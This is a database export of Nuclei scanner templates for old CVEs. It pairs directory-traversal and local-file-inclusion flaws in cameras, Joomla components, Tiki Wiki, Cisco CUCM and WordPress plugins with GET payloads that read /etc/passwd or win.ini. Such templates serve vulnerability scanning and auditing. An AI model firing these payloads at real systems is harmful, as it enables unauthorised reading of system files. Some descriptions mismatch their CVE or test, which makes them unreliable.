"66477a413521042ccf307eca" }, "name": "CVE-2010-4231.yaml", "content": "id: CVE-2010-4231\n\ninfo:\n name: Camtron CMNC-200 IP Camera - Directory Traversal\n author: daffainfo\n severity: high\n description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.\n impact: |\n An attacker can exploit this vulnerability to access sensitive files and 
directories on the camera.\n remediation: Upgrade to a supported product version.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2010-4231\n - https://www.exploit-db.com/exploits/15505\n - https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt\n - http://www.exploit-db.com/exploits/15505/\n - https://github.com/K3ysTr0K3R/CVE-2010-4231-EXPLOIT\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N\n cvss-score: 7.8\n cve-id: CVE-2010-4231\n cwe-id: CWE-22\n epss-score: 0.01615\n epss-percentile: 0.87178\n cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: camtron\n product: cmnc-200_firmware\n tags: cve,cve2010,iot,lfi,camera,edb,camtron\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/../../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f3c7c9347f9d8a8e7b83098897aecc1fc6ca5594a43e83505cd43fdd025d6130022100832745cf9064f1897cb80f0caceac6dfa4b448f2bae9f8ca58b1b79ac602e833:922c64590222798bb761d5b6d8e72950", "hash": "0991ca33ed45c2d5bff1ddf116d337bb", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ecb" }, "name": "CVE-2010-4239.yaml", "content": "id: CVE-2010-4239\n\ninfo:\n name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion\n author: 0x_akoko\n severity: critical\n description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability.\n impact: |\n The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.\n remediation: |\n Upgrade Tiki Wiki CMS Groupware to a version that is not affected by the CVE-2010-4239 vulnerability.\n reference:\n - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt\n - https://www.openwall.com/lists/oss-security/2010/11/22/9\n 
- https://security-tracker.debian.org/tracker/CVE-2010-4239\n - https://nvd.nist.gov/vuln/detail/CVE-2010-4239\n - https://access.redhat.com/security/cve/cve-2010-4239\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2010-4239\n cwe-id: CWE-20\n epss-score: 0.03038\n epss-percentile: 0.90751\n cpe: cpe:2.3:a:tiki:tikiwiki_cms\\/groupware:5.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tiki\n product: tikiwiki_cms\\/groupware\n tags: cve,cve2010,tikiwiki,lfi,tiki\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 4a0a00473045022100b5b334a2fec00cf5a3aecc1339951bf57de03095d5f4265c23450b3a0c64bb5c02206338a21c9a89350f86820ccc9f08c7d37697834a200669fe085df7763d730318:922c64590222798bb761d5b6d8e72950", "hash": "62744ae76a959c8be559e19638a722ef", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ecc" }, "name": "CVE-2010-4282.yaml", "content": "id: CVE-2010-4282\n\ninfo:\n name: Pandora FMS < 3.1.1 - Local File Inclusion\n author: daffainfo\n severity: high\n description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.\n impact: |\n An attacker can exploit this vulnerability to access sensitive files containing confidential information, such as configuration files or user credentials. This template exercises vector (1) only, the page parameter of pandora_console/ajax.php, by requesting /etc/passwd; vectors (2) and (3) are not probed.\n remediation: Upgrade to Pandora FMS 3.1.1 or later, or apply the vendor 3.1 security patch linked below.\n reference:\n - 
https://www.exploit-db.com/exploits/15643\n - https://nvd.nist.gov/vuln/detail/CVE-2010-4282\n - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\n - http://www.exploit-db.com/exploits/15643\n - http://seclists.org/fulldisclosure/2010/Nov/326\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-4282\n cwe-id: CWE-22\n epss-score: 0.01214\n epss-percentile: 0.83767\n cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: artica\n product: pandora_fms\n tags: cve,cve2010,seclists,phpshowtime,edb,lfi,joomla,artica\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201b4cbfaddf215e4507727c41a0a0b2a5fe584d66891aa082d5d3e1c647a7bb3402202499125b034828944ede2fdfc1673a00684dbc3abdb877a5ef2baa1824041954:922c64590222798bb761d5b6d8e72950", "hash": "d534023f85859e7d1e343e49a162e44f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ecd" }, "name": "CVE-2010-4617.yaml", "content": "id: CVE-2010-4617\n\ninfo:\n name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! 
allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/15791\n - https://nvd.nist.gov/vuln/detail/CVE-2010-4617\n - http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/64223\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-4617\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.80104\n cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: kanich\n product: com_jotloader\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,kanich\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204933fa3b4ca21398fbcd1ce68db7fa44c963d2d530bbafbe0405fc0e5112db32022100ab0c92e462dd2e49ea684140fb5a8d3ba7c9fa7b1a6f1f657c4b49adba8fc93c:922c64590222798bb761d5b6d8e72950", "hash": "35fe5ad7db1da39c15eab84e9594a87a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ece" }, "name": "CVE-2010-4719.yaml", "content": "id: CVE-2010-4719\n\ninfo:\n name: Joomla! Component JRadio - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! 
allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to further compromise.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/15749\n - https://nvd.nist.gov/vuln/detail/CVE-2010-4719\n - http://packetstormsecurity.org/files/view/96751/joomlajradio-lfi.txt\n - http://www.exploit-db.com/exploits/15749\n - http://www.fxwebdesign.nl/index.php?option=com_content&view=article&id=20&Itemid=56\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-4719\n cwe-id: CWE-22\n epss-score: 0.04503\n epss-percentile: 0.92278\n cpe: cpe:2.3:a:fxwebdesign:com_jradio:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: fxwebdesign\n product: com_jradio\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,fxwebdesign\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502207f173747822e13f460537c9f352c220b09c207c8d434d6851187c72c919607d9022100b83c290b935b1c2ab7d8803f7fba050894f359981c55eebe2e7b320f92dc2edd:922c64590222798bb761d5b6d8e72950", "hash": "cf6a7e5c7fb83240596ec24ae7c46fcf", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ecf" }, "name": "CVE-2010-4769.yaml", "content": "id: CVE-2010-4769\n\ninfo:\n name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! 
allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/15585\n - https://nvd.nist.gov/vuln/detail/CVE-2010-4769\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-4769\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.80059\n cpe: cpe:2.3:a:janguo:com_jimtawl:1.0.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: janguo\n product: com_jimtawl\n tags: cve,cve2010,joomla,lfi,edb,janguo\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220021f9becb5c0bae1d43b564ebe8c9145f4eba9fc6c340cc21ec9fe385112ccc1022100dfaf431bb69d21f56a3e2881f2da3e15463fe22ee8c1337c9b21d31f46994653:922c64590222798bb761d5b6d8e72950", "hash": "1f9c553e34b34577d5d5f38859a2c49b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed0" }, "name": "CVE-2010-4977.yaml", "content": "id: CVE-2010-4977\n\ninfo:\n name: Joomla! Component Canteen 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php.\n impact: |\n CVE-2010-4977 tracks the SQL injection in the mealid parameter described above; this template does not test it. It instead probes the directory traversal in the controller parameter reported in the same advisory (see the joomlacanteen-lfisql reference), so a match demonstrates arbitrary local file read, which can expose configuration.php with the database credentials and, where the file is included rather than merely read, lead to remote code execution and compromise of the entire Joomla! 
installation.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/34250\n - https://nvd.nist.gov/vuln/detail/CVE-2010-4977\n - http://www.salvatorefresta.net/files/adv/Canteen%20Joomla%20Component%201.0%20Multiple%20Remote%20Vulnerabilities-04072010.txt\n - http://packetstormsecurity.org/1007-exploits/joomlacanteen-lfisql.txt\n - http://securityreason.com/securityalert/8495\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-4977\n cwe-id: CWE-89\n epss-score: 0.0016\n epss-percentile: 0.51628\n cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: miniwork\n product: com_canteen\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,miniwork,sqli\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220090ace41aa0b7a63b491ff1b35ea977e018fd5f7ac4e5bebe586d7c925dab5ef0220211b310be5c582ef6ae23ddaeb61459599b65fb35f6b0ea543195a0f7cdf0a93:922c64590222798bb761d5b6d8e72950", "hash": "1e79b0deef5222d9839c8b0e5bf4dcfe", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed1" }, "name": "CVE-2010-5028.yaml", "content": "id: CVE-2010-5028\n\ninfo:\n name: Joomla! Component JE Job 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! 
allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12601\n - https://nvd.nist.gov/vuln/detail/CVE-2010-5028\n - http://www.vupen.com/english/advisories/2010/1269\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58599\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-5028\n cwe-id: CWE-89\n epss-score: 0.00316\n epss-percentile: 0.67285\n cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: harmistechnology\n product: com_jejob\n tags: cve,cve2010,joomla,lfi,edb,harmistechnology,sqli\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100df2b627845f4cfe972f4569690174ffe89b4221f5be16d0a6cb676e29ce2b84202203a4014cdc61ccefa25815adf442d68757eb46d7c0dbe703bf8b7d1739538f26a:922c64590222798bb761d5b6d8e72950", "hash": "c4e239ece99809e4f9bf8495a0072d90", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed2" }, "name": "CVE-2010-5278.yaml", "content": "id: CVE-2010-5278\n\ninfo:\n name: MODx manager - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. 
(dot dot) in the class_key parameter when magic_quotes_gpc is disabled.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.\n remediation: |\n Apply the latest patches and updates provided by MODx to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/34788\n - https://nvd.nist.gov/vuln/detail/CVE-2010-5278\n - http://packetstormsecurity.org/1009-exploits/modx202pl-lfi.txt\n - http://modxcms.com/forums/index.php/topic,55104.0.html\n - http://modxcms.com/forums/index.php/topic,55105.msg317273.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2010-5278\n cwe-id: CWE-22\n epss-score: 0.06122\n epss-percentile: 0.93381\n cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: modx\n product: modx_revolution\n tags: cve,cve2010,lfi,edb,packetstorm,modx\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008e76f7a4d677f1d7ef95c2948ec7ed1373b61aaf7d8079dee4d600ee0124e6a80220414a9a52b2fc1f231283eec54414a71ccd7fddfadfdfd55c76cddaa64c4d10f5:922c64590222798bb761d5b6d8e72950", "hash": "96d4c954b10103e00e48d818a1a629c3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed3" }, "name": "CVE-2010-5286.yaml", "content": "id: CVE-2010-5286\n\ninfo:\n name: Joomla! Component Jstore - 'Controller' Local File Inclusion\n author: daffainfo\n severity: critical\n description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! 
allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Arbitrary file inclusion leading to remote code execution\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/34837\n - https://nvd.nist.gov/vuln/detail/CVE-2010-5286\n - http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C\n cvss-score: 10\n cve-id: CVE-2010-5286\n cwe-id: CWE-22\n epss-score: 0.07071\n epss-percentile: 0.93832\n cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joobi\n product: com_jstore\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,joobi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203fb561e1ab44aaeb747e0238060527aad3bc02b20463ff0f288bc3d2ae95c3ff022062cf30b18e1bd5e1990e6fc55e60e0752092d76ff94a15f6061a6f373e4c3945:922c64590222798bb761d5b6d8e72950", "hash": "f44de64b2740b5d3b2592a6e120f7f91", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed4" }, "name": "CVE-2011-0049.yaml", "content": "id: CVE-2011-0049\n\ninfo:\n name: Majordomo2 - SMTP/HTTP Directory Traversal\n author: pikpikcu\n severity: medium\n description: A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. 
(dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.\n impact: |\n This vulnerability can lead to unauthorized access to sensitive files and data on the server.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/16103\n - https://nvd.nist.gov/vuln/detail/CVE-2011-0063\n - http://www.kb.cert.org/vuls/id/363726\n - https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481\n - http://securityreason.com/securityalert/8061\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2011-0049\n cwe-id: CWE-22\n epss-score: 0.96615\n epss-percentile: 0.99548\n cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mj2\n product: majordomo_2\n tags: cve,cve2011,majordomo2,lfi,edb,mj2\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502200847c0a8d121afe8c41b188ad79df89989aaa8406806a47fe74f2d39e80ff3f0022100de97a86b56c22a25c27f8f4e127d9529cb5d44d6e0cd37714be04e1ec1e30997:922c64590222798bb761d5b6d8e72950", "hash": "1c1ebf817fd0bbc5402c3ba5f00f02d2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed5" }, "name": "CVE-2011-1669.yaml", "content": "id: CVE-2011-1669\n\ninfo:\n name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.\n impact: |\n An attacker can read arbitrary files on the 
server, potentially leading to unauthorized access to sensitive information.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669\n - https://www.exploit-db.com/exploits/17119\n - http://www.exploit-db.com/exploits/17119\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/66559\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2011-1669\n cwe-id: CWE-22\n epss-score: 0.02966\n epss-percentile: 0.89875\n cpe: cpe:2.3:a:mikoviny:wp_custom_pages:0.5.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mikoviny\n product: wp_custom_pages\n google-query: inurl:\"/wp-content/plugins/wp-custom-pages/\"\n tags: cve,cve2011,edb,wordpress,wp-plugin,lfi,mikoviny\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220494970bc2de72594ab8da27efeb9427a0eba928ba7e49b4eb191b682bda14ad1022100905b334c25e0b7169d2adbb77e2f68f49d388a46f12a9a13291a7e5a035fe981:922c64590222798bb761d5b6d8e72950", "hash": "7a4e5ecfcd102760aed9cae8cbc02a16", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed6" }, "name": "CVE-2011-2744.yaml", "content": "id: CVE-2011-2744\n\ninfo:\n name: Chyrp 2.x - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code 
execution, or complete compromise of the affected system.\n remediation: |\n Upgrade Chyrp to the latest version or apply the necessary patches provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/35945\n - http://www.openwall.com/lists/oss-security/2011/07/13/6\n - https://nvd.nist.gov/vuln/detail/CVE-2011-2744\n - http://securityreason.com/securityalert/8312\n - http://www.ocert.org/advisories/ocert-2011-001.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2011-2744\n cwe-id: CWE-22\n epss-score: 0.01541\n epss-percentile: 0.86842\n cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: chyrp\n product: chyrp\n tags: cve,cve2011,lfi,chyrp,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220754b4ba2abae3c78a2e9e383db1f8a5610313a788aa30bae90556556e31a85d20221009bd64e51d469c11e836eb02211169a9efd4322295b411e2a9afe0f9efa702fa4:922c64590222798bb761d5b6d8e72950", "hash": "63302fec2c9059f2304ee133a59992c0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed7" }, "name": "CVE-2011-2780.yaml", "content": "id: CVE-2011-2780\n\ninfo:\n name: Chyrp 2.x - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. 
(dot dot) in the file parameter, a different vulnerability than CVE-2011-2744.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - http://www.justanotherhacker.com/advisories/JAHx113.txt\n - http://www.openwall.com/lists/oss-security/2011/07/13/5\n - http://www.ocert.org/advisories/ocert-2011-001.html\n - http://www.openwall.com/lists/oss-security/2011/07/13/6\n - http://securityreason.com/securityalert/8312\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/68565\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2011-2780\n cwe-id: CWE-22\n epss-score: 0.03327\n epss-percentile: 0.91127\n cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: chyrp\n product: chyrp\n tags: cve,cve2011,lfi,chyrp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ab3340adb074a840c8283299b9fac09e4325d3a44d167aa3ac9d2827d14d49bd022100beb78853f6c850bc5953e75678cbccdce68edc349f14b91a45ad79f2eff254cb:922c64590222798bb761d5b6d8e72950", "hash": "bb5f890f40d2d8912e653670bc852494", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed8" }, "name": "CVE-2011-3315.yaml", "content": "id: CVE-2011-3315\n\ninfo:\n name: Cisco CUCM, UCCX, and Unified IP-IVR - Directory Traversal\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX 
or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.\n impact: |\n An attacker can exploit this vulnerability to access sensitive files and directories on the affected system.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/36256\n - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-uccx\n - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-cucm\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N\n cvss-score: 7.8\n cve-id: CVE-2011-3315\n cwe-id: CWE-22\n epss-score: 0.72021\n epss-percentile: 0.97988\n cpe: cpe:2.3:h:cisco:unified_ip_interactive_voice_response:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cisco\n product: unified_ip_interactive_voice_response\n tags: cve,cve2011,lfi,cisco,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203755f7c63e99d436630a8407a862c05b9ba15cc8afbe6ff69938ced0202577080220564c8d53df44ef235f4749d857dba8cc0317888378371e240f8aa04dc6b306fb:922c64590222798bb761d5b6d8e72950", "hash": "c78c1547f97ea2c2e53cd80bc3d98ce8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ed9" }, "name": "CVE-2011-4336.yaml", "content": "id: CVE-2011-4336\n\ninfo:\n name: Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Tiki Wiki CMS 